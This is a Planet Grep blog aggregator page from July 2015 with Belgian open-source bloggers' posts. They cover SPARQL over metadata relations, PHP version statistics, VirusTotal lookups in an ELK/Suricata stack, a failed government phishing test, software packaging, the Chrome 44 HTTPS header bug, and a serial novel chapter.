Subscriptions

Planet Grep is open to all people who either have the Belgian nationality or live in Belgium, and who actively work with or contribute to Open Source/Free software.

About Planet Grep...

Other planets can be found at the Planet Index.

A complete feed is available in a number of syndication formats: RSS 1.0, RSS 2.0, FOAF, and OPML.

The layout of this site was done by Gregory

August 01, 2015

Philip Van Hoof

Making use of relations between metadata

I recently claimed somewhere that a system which collects relations about content (where, when, with whom, why) instead of mere metadata (title, date, author, and so on) could offer a solution to a problem that users of digital media will face more and more: they will have gathered so much material that they can no longer find anything in it quickly enough.

I think relations should be given more weight than plain metadata, because it is through relations that we humans store information in our brains. Not through facts (title, date, author, and so on), but through relations (where, when, with whom, why).

As a hypothetical example, I said I wanted to find a video that I had watched with Erika while on holiday with her, and which she had marked as really great.

Which relations do we need to collect? That is a simple little analysis exercise: just underline the nouns and write the problem out again:

So let me pour this use case into RDF and solve it with SPARQL. This is what we need to collect. I'm writing it in pseudo TTL. Assume for a moment that this ontology fully exists:

<erika> a Person ; name "Erika" .
<vakantiePlek> a PointOfInterest ; title "De vakantieplek" .
<filmA> a Movie ; lastSeenAt <vakantiePlek> ; sharedWith <erika>; title "The movie" .
<erika> likes <filmA> .

This, then, is the SPARQL query:

SELECT ?m { ?v a Movie ; title ?m . ?v lastSeenAt ?p . ?p title ?pt . ?v sharedWith <erika> . <erika> likes ?v . FILTER (CONTAINS(?pt, 'vakantieplek')) }

I leave it as an exercise for the reader to convert this to the Nepomuk ontology (which, I believe, can handle this entire use case). You can then test it on your N9 or on a standard GNOME desktop with the tracker-sparql tool. I bet it works. :-)

The big problem is indeed the data acquisition of the relations. Writing the query is fairly easy. Pinning down the ontology and agreeing on it with all parties, somewhat less so. Gathering the information is the real difficulty.

Oh, and once it has been gathered, keeping that information safe without violating my privacy. These days that simply seems impossible. Unfortunately.

In any case, there is no need for a supercomputer or the like to solve this centrally (with AI and all of today's horribly complex hype).

Every small device can handle this kind of use case on its own. The inserts and the query above are easy to process. SQLite does this in a few milliseconds with a denormalised schema. Your fancy hipster NoSQL solution probably does too.

That is because the weight of the data acquisition lies on the relations rather than on the facts.
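To make the SQLite claim concrete, here is a minimal sketch in PHP with PDO; the denormalised table layout and column names are my own invention for illustration, not part of any existing ontology:

<?php
// Hypothetical denormalised table: one row per movie with its relations.
$db = new PDO('sqlite::memory:');
$db->exec('CREATE TABLE movie_relations (
    title TEXT, last_seen_at TEXT, shared_with TEXT, liked_by TEXT)');
$db->exec("INSERT INTO movie_relations VALUES
    ('The movie', 'De vakantieplek', 'Erika', 'Erika')");

// "The movie I watched with Erika at the holiday place, which she liked."
$stmt = $db->prepare('SELECT title FROM movie_relations
    WHERE last_seen_at LIKE ? AND shared_with = ? AND liked_by = ?');
$stmt->execute(['%vakantieplek%', 'Erika', 'Erika']);
print_r($stmt->fetchAll(PDO::FETCH_COLUMN));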

by admin at August 01, 2015 02:48 PM

July 31, 2015

Frank Goossens

I Am A Cyclist, And I Am Here To Fuck You Up

I Am A Cyclist, And I Am Here To Fuck You Up

It is morning. You are slow-rolling off the exit ramp, nearing the end of the long-ass commute from your suburban enclave. You have seen the rise of the city grow larger and larger in your windshield as you crawled through sixteen miles of bumper-to-bumper traffic. You foolishly believed that, now that you are in the city, your hellish morning drive is coming to an end.

Just then! I emerge from nowhere to whirr past you at twenty-two fucking miles per hour, passing twelve carlengths to the stoplight that has kept you prisoner for three cycles of green-yellow-red. The second the light says go, I am GOING, flying, leaving your sensible, American, normal vehicle in my dust.

by frank at July 31, 2015 07:34 AM

July 30, 2015

Joram Barrez

The Activiti Performance Showdown Running on Amazon Aurora

Earlier this week, Amazon announced that Amazon Aurora is generally available on Amazon RDS. The Aurora website promises a lot: Amazon Aurora is a MySQL-compatible, relational database engine that combines the speed and availability of high-end commercial databases with the simplicity and cost-effectiveness of open source databases. Amazon Aurora provides up to five times better […]

by Joram Barrez at July 30, 2015 03:09 PM

Frank Goossens

Folding-bike dilemmas 2015

After 5 years of folding-bike riding, an estimated 23,000 km and 3 new handlebar hinges (!), I have finally replaced my Dahon Vitesse D7HG. I did wonder whether to go for a Brompton after all, but even the base model costs almost twice as much, and taking into account the options I would have to pay extra for, my mileage, the terrain (Brussels is demanding on both bike and rider) and my... wear-and-tear riding style, I really don't see that extra investment paying off.

Old (2010) and new (2015), together for a little while longer

So a new Dahon Vitesse D7HG it is (and yes, again with that Shimano Nexus 7-speed internal hub; who on earth would still want to ride around with a derailleur?), but that wasn't the end of the doubting: buy it online more than 20% cheaper (!), or go with the bike shop around the corner. The bike shop won; for repairs under warranty (handlebar hinges, for example) the online store requires you to ship the bike in, and you easily lose it for a few weeks. And for ordinary repairs, over the past 5 years (and before that, with my other bikes) they have always helped me quickly, well and cheaply despite being busy. No, that 20% investment in the best after-sales service (and in the local economy) will pay for itself.

by frank at July 30, 2015 07:21 AM

July 29, 2015

Mattias Geniar

Why We’re Still Seeing PHP 5.3 In The Wild (Or: PHP Versions, A History)

The post Why We’re Still Seeing PHP 5.3 In The Wild (Or: PHP Versions, A History) appeared first on ma.ttias.be.

WordPress offers an API that can list the PHP versions used in the wild. It shows some interesting numbers that warrant some extra thoughts.

Here are the current statistics on PHP versions used in WordPress installations, using jq for JSON formatting at the CLI.

$ curl http://api.wordpress.org/stats/php/1.0/ | jq '.'
{
  "5.2": 13.603,
  "5.3": 32.849,
  "5.4": 40.1,
  "5.5": 9.909,
  "5.6": 3.538
}

Two versions stand out: PHP 5.3 is used in 32.8% of all installations, PHP 5.4 on 40.1%.

Both of these versions are end of life. Only PHP 5.4 still receives security updates [2], and only until mid-September of this year. No more bug fixes. That's 1.5 months left on the clock.

But if they're both considered end of life, why do they still account for 72.9% of all WordPress installations?
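For the record, that percentage can be recomputed straight from the same API response; a small PHP sketch, with the two end-of-life versions from the statistics above hard-coded:

<?php
// Fetch the WordPress statistics endpoint and add up the market share of
// PHP 5.3 and 5.4, the two end-of-life versions discussed here.
$stats = json_decode(file_get_contents('http://api.wordpress.org/stats/php/1.0/'), true);
$eol   = ['5.3', '5.4'];
$share = array_sum(array_intersect_key($stats, array_flip($eol)));
printf("PHP 5.3 and 5.4 together power %.1f%% of WordPress installs\n", $share);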

Prologue: Shared Hosting

These stats are gathered anonymously by WordPress. Since most WordPress installations are on shared hosting, it's safe to assume they were set up once and never looked at again. It's a good thing WordPress can auto-update, or the web would be doomed.

There are of course WordPress installations on custom servers, managed systems, etc., but they account for a small percentage of all WordPress installations. It's important to keep in mind that the rest of these numbers apply mostly to shared hosting only.

PHP Version Support

Here's a quick history of relevant PHP versions, meaning 5.0 and upwards. I'll ignore the small percentage of sites still running on PHP 4.x.

Version  Released             End                    Total duration
5.0      July 13th, 2004      September 5th, 2005    419 days
5.1      November 24th, 2005  August 24th, 2006      273 days
5.2      November 2nd, 2006   January 6th, 2011      1526 days
5.3      June 30th, 2009      August 14th, 2014      1871 days
5.4      March 1st, 2012      September 14th, 2015   1292 days
5.5      June 20th, 2013      July 10th, 2016        1116 days
5.6      August 28th, 2014    August 28th, 2017      1096 days

It's no wonder we're still seeing PHP 5.3 in the wild: the version has been supported for more than five years. That means a lot of users will have installed WordPress on a PHP 5.3 host and simply never bothered updating, because of the install-once, update-never mentality.

As long as their WordPress continues to work, why would they -- right? [1]

If my research was correct, in 2005 there were 2 months where there wasn't a supported version of PHP 5. At that time, support for 5.0 was dropped and 5.1 wasn't released until a couple of months later.

Versions vs. Server Setups

PHP has been around for a really long time and it's seen its fair share of server setups. It's been run as mod_php in Apache, CGI, FastCGI, embedded, CLI, litespeed, FPM and many more. We're now evolving to multiple PHP-FPM masters per server, each for its own site.

With the rise of HHVM, we'll see even more different types of PHP deployments.

From what I can remember of my earlier days in hosting, this was the typical PHP setup on shared hosting.

Version Server setup
5.0 Apache + mod_php
5.1 Apache + mod_php
5.2 Apache + suexec + CGI
5.3 Apache + suexec + FastCGI
5.4 Apache + FPM
5.5 Apache + FPM
5.6 Apache + FPM

The server-side has seen a lot of movement. The current method of running PHP as FPM daemons is far superior to running it as mod_php or CGI/FastCGI. But it took the hosting world quite some time to adopt this.

Even with FPM support coming to PHP 5.3, most servers were still running as CGI/FastCGI.

That was/is a terrible way to run PHP.

It's probably what made it take so long to adopt PHP 5.4 on shared hosting servers. It required a complete rewrite of everything that is shared hosting: no more CGI/FastCGI, but proxy setups that pass requests to PHP-FPM. And since FPM support only came to PHP 5.3 a couple of minor versions in, most hosting providers first experienced FPM on 5.4. Once their FPM config was ready, adopting PHP 5.5 and 5.6 was trivial.

Only PHP 5.5's switch to the new opcode cache (OPcache) required some configuration changes, but it didn't have any further server-side impact.

PHP 5.3 has been supported for a really long time, and PHP 5.4 took ages to be rolled out on most shared server setups, prolonging the life of PHP 5.3 long past its expiration date.

If you're installing PHP on a new Red Hat Enterprise Linux/CentOS 7, you get version 5.4. RHEL still backports security fixes [2] from newer releases to 5.4 if needed, but it's essentially an end-of-life version: it may get security fixes [2], but it won't get bug fixes.

This explains the rise of PHP 5.4 worldwide: it's the default version on the latest RHEL/CentOS.

Moving PHP forward

In order to let these ancient versions of PHP finally rest in peace, a few things need to change drastically: the very factors that have kept PHP 5.3 alive for so long.

  1. WordPress needs to bump its minimal PHP version from 5.2 to at least PHP 5.5 or 5.6
  2. Drupal 7 also runs on PHP 5.2, with Drupal 8 bumping the minimum version to 5.5.
  3. Shared Hosting providers need to drop PHP 5.2, 5.3 and 5.4 support and move users to 5.5 or 5.6.
  4. OS vendors and packagers need to make at least PHP 5.5 or 5.6 the default, instead of 5.4 that's nearly end of life.

We are doing what we can to improve point 3, by encouraging shared hosting users to upgrade to later releases. Fingers crossed that WordPress and the OS vendors do the same.

It's unfair to blame the PHP project for the fact that we're still seeing 5.3 and 5.4 in the wild today. But because both versions were supported for such a long time, their install base is naturally large.

Later releases of PHP have seen shorter support cycles, which will make users think more about upgrading and schedule accordingly. Having a consistent release and deprecation schedule is vital for faster adoption rates.

[1] Well, if you ignore security, speed and scalability as added benefits.
[2] I've proclaimed "PHP's CVE vulnerabilities" as being irrelevant, and I still stand by that.

The post Why We’re Still Seeing PHP 5.3 In The Wild (Or: PHP Versions, A History) appeared first on ma.ttias.be.

by Mattias Geniar at July 29, 2015 07:32 PM

Frank Goossens

The 2 Bears Getting Together on Our Tube

The 2 Bears is a duo comprised of Hot Chip’s Joe Goddard and Raf Rundell. “Get Together” is one of the songs on their 2012 debut album “Be Strong”.

YouTube Video
Watch this video on YouTube or on Easy Youtube.

by frank at July 29, 2015 06:05 AM

July 28, 2015

Xavier Mertens

Integrating VirusTotal within ELK

[This blog post has also been published as a guest diary on isc.sans.org]

Visualisation is key when you need to keep track of what's happening on networks that carry tons of malicious files every day. virustotal.com is a key player in the daily fight against malware. Not only can you submit and search for samples on their website, they also provide an API to integrate virustotal.com into your own software or scripts. A few days ago, Didier Stevens posted some SANS ISC diaries about the integration of VirusTotal into Microsoft Sysinternals tools (here, here and here). The most common API call is to query the database for a hash. If the file was already submitted by someone else and successfully scanned, you'll get back interesting results, the best known being the file score in the form "x/y". The goal of my setup is to integrate virustotal.com within my ELK stack. To feed VirusTotal, hashes of interesting files must be computed. I'm getting those hashes via my Suricata IDS, which inspects all the Internet traffic passing through my network.
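Before wiring anything together, the hash lookup itself is easy to try by hand. Here is a minimal PHP sketch against the public VirusTotal v2 API; the API key placeholder is yours to fill in, and the MD5 below is the well-known EICAR test file:

<?php
// Minimal sketch: ask the VirusTotal v2 API for an existing report on a hash.
$params = http_build_query([
    'apikey'   => '<put_your_vt_api_key_here>',
    'resource' => '44d88612fea8a8f36de82e1278abb02f', // MD5 of the EICAR test file
]);
$report = json_decode(
    file_get_contents('https://www.virustotal.com/vtapi/v2/file/report?' . $params),
    true
);
if ($report && $report['response_code'] === 1) {
    printf("Score: %d/%d\n", $report['positives'], $report['total']);
}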

The first step is to configure MD5 hash support in Suricata. The steps are described here. Suricata logs are processed by a Logstash forwarder, and MD5 hashes are stored and indexed via the field 'fileinfo.md5':

[Screenshot: the indexed fileinfo.md5 field]

Note: it is mandatory to configure Suricata properly to extract files from network flows. Otherwise, the MD5 hashes won't be correct; it's like using a snaplen of '0' with tcpdump. In Suricata, have a look at the inspected response body size for HTTP requests and the stream reassembly depth. These settings can also have an impact on performance, so fine-tune them to match your network's behaviour.

To integrate VirusTotal within ELK, a Logstash filter already exists, developed by Jason Kendall. The code is available on github.com. To install it, follow this procedure:

# cd /data/src
# git clone https://github.com/coolacid/logstash-filter-virustotal.git
# cd logstash-filter-virustotal
# gem2.0 build logstash-filter-awesome.gemspec
# cd /opt/logstash
# bin/plugin install /data/src/logstash-filter-virustotal/logstash-filter-virustotal-0.1.1.gem

Now, create a new filter which will call the plugin and restart Logstash.

filter {
    if ( [event_type] == "fileinfo" and
         [fileinfo][filename] =~ /(?i)\.(doc|pdf|zip|exe|dll|ps1|xls|ppt)/ ) {
        virustotal {
            apikey => '<put_your_vt_api_key_here>'
            field => '[fileinfo][md5]'
            lookup_type => 'hash'
            target => 'virustotal'
        }
    }
}

The filter above will query virustotal.com for the MD5 hash stored in 'fileinfo.md5' if the event contains file information generated by Suricata and if the filename has an interesting extension. Of course, you can adapt the filter to your own environment and match only specific file formats using 'fileinfo.magic' or a minimum file size using 'fileinfo.size'. If the conditions match a file, a query is performed using the virustotal.com API and the results are stored in a new 'virustotal' field:

[Screenshot: VirusTotal results stored in the 'virustotal' field]

Now it's up to you to build the Elasticsearch queries and dashboards to detect suspicious activity on your network. During the implementation, I noticed that too many requests sent in parallel to virustotal.com might freeze my Logstash instance (mine is 1.5.1). Also, keep an eye on your API key consumption so you don't exceed your request rate or daily/monthly quota.

by Xavier at July 28, 2015 05:57 PM

The Rough Life of Defenders VS. Attackers

Yesterday was the first time I heard the expression "social engineering" in the Belgian public media! If this topic made the news, you can imagine that something weird (or juicy, from a journalist's perspective) happened. The Flemish administration had the good idea to test the resistance of its 15K officials against a phishing attack. As people remain the weakest link, that sounds like a good initiative, right? But if it was disclosed in the news, you can imagine that it was in fact... a flop! (The article is available here, in French.)

The scenario was classic but well written. People received an email from Thalys, an international train operator (used by many Belgian travellers), which reported a billing issue with their last trip: if they did not provide their bank details, their credit card would be charged up to 20K EUR. The people behind this scenario had not thought about the possible side effects of such a massive mailing. People flooded the Thalys customer support centre with angry calls; others simply notified the police. Thalys, being a commercial company, reacted to the lack of communication and the unauthorised use of its brand in the rogue email.

I have already performed this kind of social engineering attack for customers, and I know it is definitely not easy. Instead of breaking into computers, we are trying to break into human behaviour, and people's reactions can be very different: fear, shame, anger, ... I suppose the Flemish government was working with a partner or contractor to organise the attack. They should have followed a few basic rules:

But a few hours ago, while driving back home and thinking about this sorry story, I realised that it proves once again the big difference between defenders and attackers! Attackers use copyrighted material all the time; they build fake websites or compromise official ones to inject malicious payloads into visitors' browsers. They send millions of emails targeting everybody. On the other side, defenders have to do their job while covering their ass at the same time! And recent changes like the updated Wassenaar Arrangement won't help in the future. I'm curious about the results of this giant test. How many people actually clicked, opened a file or handed over their bank details? That was not reported in the news...

by Xavier at July 28, 2015 08:37 AM

Kris Buytaert

The power of packaging software, package all the things

Software delivery is hard. Plenty of people all over this planet struggle with delivering software into their own controlled environments. They have invented great patterns that build an artifact, then do some magic, and the application is up and running.

When talking about continuous delivery, people invariably discuss their delivery pipeline and the different components that need to be in it. Often the focus on getting the application deployed or upgraded from that pipeline is so strong that teams forget how to deploy their environment from scratch.

After running a number of tests on the code and compiling it where needed, people want to move forward quickly and deploy their release artifact on an actual platform. This deployment is typically done via a file upload, or a checkout from a source-control tool, onto the dedicated computer on which the application resides. Sometimes dedicated tools are integrated to simulate what a developer would do manually to get the application running: copy three files left, one right, and make sure you restart the service. Although this is obviously already a large improvement over people manually pasting commands from a 42-page run book, it doesn't solve all problems.

Take the guy who quickly makes a change on the production server and never commits it (say goodbye to git pull as your upgrade process). If you package your software, there are a couple of things you get for free from your packaging system. Questions like "has this file been modified since I deployed it", "where did this file come from", "when was it deployed" and "what version of software X do I have running on all my servers" are easily answered by the same tools we already use for every other package on the system. Not only can you use existing tools, you are also using tools that are well known by your ops team and that they already use for every other piece of software on your system.

If your build process creates a package and uploads it to a package repository that is available to the hosts in the environment you want to deploy to, there is no longer any need for a script that copies the artifact from a third-party location, and even less for that 42-page document which never gets updated and still tells you to download yaja.3.1.9.war from a location where you can only find 3.2 and 3.1.8, while the developer who knows whether you can use 3.2, or why 3.1.9 was removed, has just left for the long weekend.

Another, and maybe even more important, issue is the sadly growing practice of having yet another tool in place that translates that 42-page document into a bunch of shell scripts created from a drag-and-drop interface; typically that "deploy tool" is even triggered from within the pipeline. Apart from the fact that it usually encourages non-reusable code, distributes even more SSH keys, or adds yet another agent on all systems, it doesn't take into account that you want to think of your servers as cattle and be able to deploy new instances of your application fast. Do you really want to deploy your five new nodes on AWS with a full Apache stack ready for production, then reconfigure your load balancers, only to find out that someone needs to go click in your continuous integration or deployment tool to deploy the application to the new hosts? That one manual action someone forgets? In my humble opinion, deployment tools are a phase in the maturity process of a product team: yes, they are a step up from manually deploying software, but they create more and different problems, and once your team grows in maturity, refactoring that tool out is trivial.

The obvious and trivial approach to this problem, and one that comes with even more benefits, is packaging. When you package your artifacts as operating system packages (e.g., .deb or .rpm), you can include them in the list of packages to be deployed at installation time (via Kickstart or debootstrap). Similarly, when your configuration management tool (e.g., Puppet or Chef) provisions the computer, you can specify which version of the application should be deployed by default.

So, when you're designing how you want to deploy your application, think about deploying new instances as well as deploying to existing setups (or rather, upgrading your application). Doing so will make life so much easier when you want to deploy a new batch of servers.

by Kris Buytaert at July 28, 2015 06:35 AM

July 26, 2015

Mattias Geniar

This American Life: The DevOps Episode

The post This American Life: The DevOps Episode appeared first on ma.ttias.be.

If you're a frequent podcast listener, chances are you've heard of the This American Life podcast. It's probably the most listened-to podcast available.

While it normally features all kinds of content, from humorous stories to gripping drama, last week's episode felt a bit different.

They ran a story about NUMMI, a car plant where Toyota and GM worked together to improve productivity.

Throughout the story, a lot of topics are mentioned that can all be brought back to our DevOps ways.

There are a lot more details available in the podcast, and you'd be amazed how many of them can serve as analogies for our DevOps movement.

If you're using the Overcast podcast player (highly recommended), you can get the episode here: NUMMI 2015. Or you can grab it from the official website/iTunes at ThisAmericanLife.org.

The post This American Life: The DevOps Episode appeared first on ma.ttias.be.

by Mattias Geniar at July 26, 2015 08:49 AM

July 24, 2015

Frank Goossens

How technology (has not) improved our lives

The future is bright, you’ve got to wear shades? But why do those promises for a better future thanks to technology often fail to materialize? And how is that linked with the history of human flight, folding paper and the web? Have a look at “Web Design: first 100 years”, a presentation by Maciej Cegłowski (the guy behind pinboard.in). An interesting read!

by frank at July 24, 2015 04:57 PM

Music from Our Tube; Algiers’ Black Eunuch

As heard on KCRW just now. The live version on KEXP is pretty intense, but somehow does not seem fully … fleshed out yet. Anyways, Algiers is raw, psychedelic & very promising;

YouTube Video
Watch this video on YouTube or on Easy Youtube.

by frank at July 24, 2015 09:40 AM

July 23, 2015

Mattias Geniar

Chrome 44 Sending HTTPs Header By Mistake, Breaking (Some) Web Applications

The post Chrome 44 Sending HTTPs Header By Mistake, Breaking (Some) Web Applications appeared first on ma.ttias.be.

Update #1: it's less bad than it looked, see details below.
Update #2: Chrome got updated and the HTTPS header is gone, see details below.

Now this is interesting.

In the Chrome 44 release (version 44.0.2403.89) that went out just yesterday, it appears the browser picked up a small bug, or rather, a significant change.

It's now sending the HTTPS: 1 header on every request by default. This was probably meant as a security improvement, to suggest HTTPS to the server wherever possible, but it's breaking WordPress and other web applications all over the place.

[Screenshot: Chrome 44 sending the HTTPS: 1 request header]

Why? Because most PHP software uses $_SERVER['HTTPS'] to detect whether or not the site is running behind an SSL certificate. This includes WordPress, Drupal and any custom PHP software that checks this value.

if ($_SERVER['HTTPS'] || $_SERVER['HTTP_HTTPS']) { 
  // Assume HTTPs, redirect or enable https:// prefixes on all resources (css/js/images/...)
  ...
}

The next planned release of Chrome is scheduled for July 27th, but they're investigating whether an emergency patch can be pushed out to resolve this issue.

Bugtracker: Issue 505268: Forcing WordPress sites to use https even when not directed.

This is not going to be a fun week for Chrome users.

Update #1: only HTTP_ prefixed headers are affected.

Any request header a browser sends along gets prefixed with HTTP_ in the $_SERVER global variable: the User-Agent header gets transformed into HTTP_USER_AGENT, the Accept header gets turned into HTTP_ACCEPT, and so on.

Here's what those HTTP headers look like according to PHP.

print_r($_SERVER);

Array
(
    ...
    [HTTPS] => on
    [HTTP_HOST] => ma.ttias.be
    [HTTP_ACCEPT] => text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    [HTTP_ACCEPT_ENCODING] => gzip, deflate, sdch
    [HTTP_ACCEPT_LANGUAGE] => nl-NL,nl;q=0.8,en-US;q=0.6,en;q=0.4,fr;q=0.2,it;q=0.2
    [HTTP_COOKIE] => some=value
    [HTTP_HTTPS] => 1
    [HTTP_USER_AGENT] => Mozilla/5.0
)

The first HTTPS value in the $_SERVER variable is the one set by the webserver, to indicate HTTPS or not. The second one, HTTP_HTTPS, is the HTTPS header sent by the Chrome browser, transformed into a variable for PHP.

Some PHP code, like the WooCommerce WordPress plugin, didn't only check $_SERVER['HTTPS'] but also looked at $_SERVER['HTTP_HTTPS'] to detect HTTPS on the site. That is wrong PHP code and has nothing to do with "bad PHP by design".
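A more defensive way to detect HTTPS is to only look at values the web server itself sets and never at anything carrying the HTTP_ prefix, since those values come straight from the client. A minimal sketch; the function name is mine and the port fallback is an assumption about a fairly standard setup:

<?php
// Only trust server-set values: everything prefixed with HTTP_ in $_SERVER
// is a request header and can be forged (or, as in this case, sent by accident).
function request_is_https() {
    if (!empty($_SERVER['HTTPS']) && strtolower($_SERVER['HTTPS']) !== 'off') {
        return true;
    }
    // Fallback for setups that only expose the port; behind a reverse proxy
    // you would instead check a header you explicitly trust, such as an
    // X-Forwarded-Proto value set by your own proxy.
    return isset($_SERVER['SERVER_PORT']) && (int) $_SERVER['SERVER_PORT'] === 443;
}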

The HTTP_ prefix handling in WooCommerce was probably added as a result of an Apache bug/feature that once existed, where after 301/302 rewrites some environment variables would get prefixed with an extra HTTP_ keyword.

There are also reverse proxy configs (Nginx, Varnish, ...) out there that pass environment variables along which get interpreted by Apache as headers and thus receive the HTTP_ prefix.

Either way, most plugins have had an update by now; just go to your WordPress/Drupal/... site and update all plugins. Chances are the problems will be gone, even if Chrome takes a couple more days to get the patch out.

Fixing WooCommerce specifically

Most problems are reported with WooCommerce, the WordPress plugin. Since chances are you can't log into your WordPress any more, you'll need another fix. Many thanks to Rahul Lohakare in the comments for this one.

Modify the following file, either by downloading it via FTP and uploading it again or by editing it directly on the server: wp-content/plugins/woocommerce/woocommerce.php

Comment out these lines:

if ( ! isset( $_SERVER['HTTPS'] ) && ! empty( $_SERVER['HTTP_HTTPS'] ) ) {
    $_SERVER['HTTPS'] = $_SERVER['HTTP_HTTPS'];
}

Once those have been commented (just prefix every line with #), WooCommerce/WordPress won't redirect you anymore.

If that still doesn't work, use Firefox or another browser to log into your site and update the plugin via the official WordPress update method. Since the problem is Chrome-only, you can bypass the redirect by using any other browser, temporarily.

Update #2: Chrome got updated, replaced 'HTTPS' with 'upgrade-insecure-requests'

Chrome pushed out an update; everyone should get it in a few hours. I'm now on version 44.0.2403.107, and that version or anything higher no longer has this problem.

[Screenshot: the Chrome update screen]

After the update, the HTTPS header has been replaced by the upgrade-insecure-requests header.

[Screenshot: the upgrade-insecure-requests request header]

Good news for everyone!

The post Chrome 44 Sending HTTPs Header By Mistake, Breaking (Some) Web Applications appeared first on ma.ttias.be.

by Mattias Geniar at July 23, 2015 02:22 PM

July 21, 2015

Lionel Dricot

Printeurs 34

This is post 34 of 34 in the Printeurs series.

Junior, Eva and Nellio have escaped from Junior's apartment and are now on the run, looking for an intertube station, a delivery system that is not yet officially in service.

 

"Nel... Nel...lio!"
"Junior, stop for a second!"

I take Eva in my arms and sit her down gently on a broken cinder block. Around us, the street is deserted. Weeds frolic cheerfully in the cracks of the concrete, sketching a silent organic saraband. Without thinking, I notice the dandelions surrounding a flourishing yarrow, and the borage and chamomile blooming between the patches of crabgrass. However hard we fight, pollute, weed, spray, build and cover over, we are not the masters of this planet. If we were to disappear tomorrow, it would take only a handful of years for nature to reclaim its rights completely and relegate us to the ruins of oblivion.

I am not the only one contemplating the plants: Eva is carefully winding her fingers through a forget-me-not whose electric glow stands out against the blackness of the asphalt.

"Eva? How are you feeling?"

She takes a deep breath.

"Still... hard... to talk. But I'm... getting used to it."
"Getting used to it? To what?"
"I... Nellio... I have to tell you..."

With all the gentleness I can muster, I touch her hand. She jumps at my touch and involuntarily tears out the little blue flower.

"Ow!"

Stunned, Eva spends a long moment staring at the diaphanous roots dusting her wrist with a little black, sandy soil. A tear beads at the corner of her eyelid, slides over her cheekbone and falls onto the tiny flower. I hear her murmur, in barely a breath:
"Sorry..."
"Right, lovebirds, can we get going? I don't feel like hanging around, and we're almost there!"

I start and turn towards Junior, whose scarlet face is streaming with sweat.

"You look like you could use a break too, though. Your body isn't used to physical effort."
"I'll take a break somewhere with air conditioning. Otherwise it's not a break, it's torture. How can anyone still get around on foot, outdoors? It's beyond me! We're not in the Middle Ages any more, are we?"
"Do you at least know where you're taking us?"
"Yes, I keep telling you, one of the first urban intertube terminals is in a disused government building two blocks from here. Come on, let's go!"

I hold out my hand to Eva, but she refuses it and gets up, giving me a hard look. She seems to be gradually getting her faculties back and is now able to walk on her own.

That she is out of danger is both a relief and the trigger for an avalanche of questions in my tortured mind. Eva, whom I was artificially in love with; Eva, whom I believed dead; Eva, for whom I no longer know what to feel. Is it love I feel, or friendship? Am I now free of all artificial influence? Isn't my sexual attraction to her just a reflex, an acquired habit? For that matter, do I really want to sleep with a woman? I realise that I haven't slept with either a man or a woman for months, and that my judgement must be affected by it.

"Shit," Junior exclaims. "They've repurposed the building. I thought it was deserted. What do we do?"
"We give it a shot," I say, shrugging.

Without taking time to think, the three of us push open the front door and step into a room that has clearly been fitted out as a waiting room. A few motley characters seem to be killing time. Nobody looks up as we approach.

"The terminal must be in the basement," Junior whispers to me, pointing at the stairwell.

As we try to slip through discreetly, a hand lands on my shoulder.
"Hey, you there! Them stairs is reserved for startuppers!"

I spin around, fists clenched. A cry of surprise strangles in my throat. Those red curls, those puffy cheeks...
"Isa!"
"Nellio! And that other one there, that's the cop! Holy shit!"

In the waiting room, listless gazes begin to stir and turn towards us. I try to keep the initiative.
"So what are you doing here, Isa?"
"Well, I've become an advisor. I'm the one who checks the tele-passes. My speciality is startups! That way the tele-pass folks don't have to find a job, they just have to create one."

I am taken aback for a moment.

"You know about startups?"
"I know all about looking for work, that's for sure. And I'm really good at the tests. Anyway, you can't go down there, unless you want to create a startup."
"Well, as it happens," Junior cuts in, "that's why we're here. We need advice."
"Oh, that's funny! Come with me, then."

A protest rises from the waiting room. A slight young woman with turquoise hair and a nose pierced with metal studs objects.
"I'm here to create my startup and become a millionaire too, and I've been waiting longer. It's disgusting, why do they get to go first?"

Isa looks her up and down with an air of importance.
"Who's your advisor?"
"Madame Dubrun-Macoy."
"I can't take tele-passes who already have an assigned advisor."
"But she retired!"
"So what?"
"She's not there any more, so I don't have an advisor any more."

She waves a sheaf of papers. Isa grabs it.
"It says Dubrun-Macoy on your file, I can't take you."
"Then what am I supposed to do?"
"You have to deregister and register again to get a new advisor."
"But..."
"And that's not done here! You have to go through the central office."
"But I want to create a startup!"
"If you don't have an advisor, you're not allowed to. It's simple enough, isn't it?"

The young woman suddenly starts to cry.
"But... but you don't know what I'm going through. For weeks they've been sending me from office to office. I want to work, I want to create!"
"I know very well. I used to be just like you. And I got moving; I got this job through sheer willpower, not by whining."

Turning her back on her, Isa leads us after her into the stairwell. I barely have time to catch the voice of one of the men in the waiting room addressing the young woman.

"Say, what's the trick for becoming a millionaire? Because I'd quite like that myself..."

The rest is drowned out by the sound of our footsteps on the stairs. Fluorescent tubes light a pallid room hastily converted into an office.

"So you want to create a startup, do you? This isn't some dodgy scheme like last time?"

She giggles.

"Mind you, I did get to see Georges Farreck. And that I owe to you, Nellio. I'm quite proud of it. He's not as good in real life, though. Didn't even get me wet!"
"Listen, Isa, you have to help us, we..."
"Oh no! That's over! No more Isa the soft touch! I've got a position and I intend to keep it. Either you take the tests with me to create a startup, or you leave. But no funny business! I'm honest, I am!"
"But..."
"Do you want to create a startup or not?"
"Yes, yes, we want to create a startup," Junior cuts in, nudging me with his elbow. He goes on:
"The three of us are programmers and we want to create a dating app for one-night stands."

Isa's eyes suddenly start to sparkle.
"Ah! Now that's not a bad idea. Original. And you've already got an idea before even starting the test. That's good."
"Say," I ask innocently, "have you been in this basement long? Have all the rooms been turned into offices?"

She looks at me in surprise.

"There's just my office, because there was no more room upstairs. As for the rest, I don't really know. Right, I'm going to go get the marbles for the test. Get ready!"
"Get ready?"
"Well yes, startups are cool, they're fun, they're a team thing. It's not enough to just sort the white balls from the black ones. You also have to show some enthusiasm."

Junior looks at me, frowning. I'm not sure I quite understand myself.
"And the others, what do they usually do?"
"They sing. Or they dance. Or they do something a bit fun."
"And that helps them create a startup?"
"Well yes, I'm the one who has them sign the incorporation paper at the end of the test."
"I mean: do they create profitable businesses?"

It's Isa's turn to give me a surprised look. I press on:
"Do they make money afterwards?"
"How should I know? I put them through the test, I sign the paper and sometimes I see them again a few months later for a new startup. Serial entrepreneurs, that lot call themselves. Right, I'm off to get the marbles. Stay right there!"

On her way out, Isa gives me an almost imperceptible wink and, with a little movement of her head, points out a door at the back of the room. I wait a second before leaping up:
"Quick!"

Junior falls into step behind me. We discover a corridor that widens as it goes. At its centre is a clear space where ovoid containers of various sizes are piled up.
"The terminal," Junior breathes. "Makes sense, it's right in the middle of the building."
"All I see is boxes. Where is this famous intertube?"
"Under your feet!"

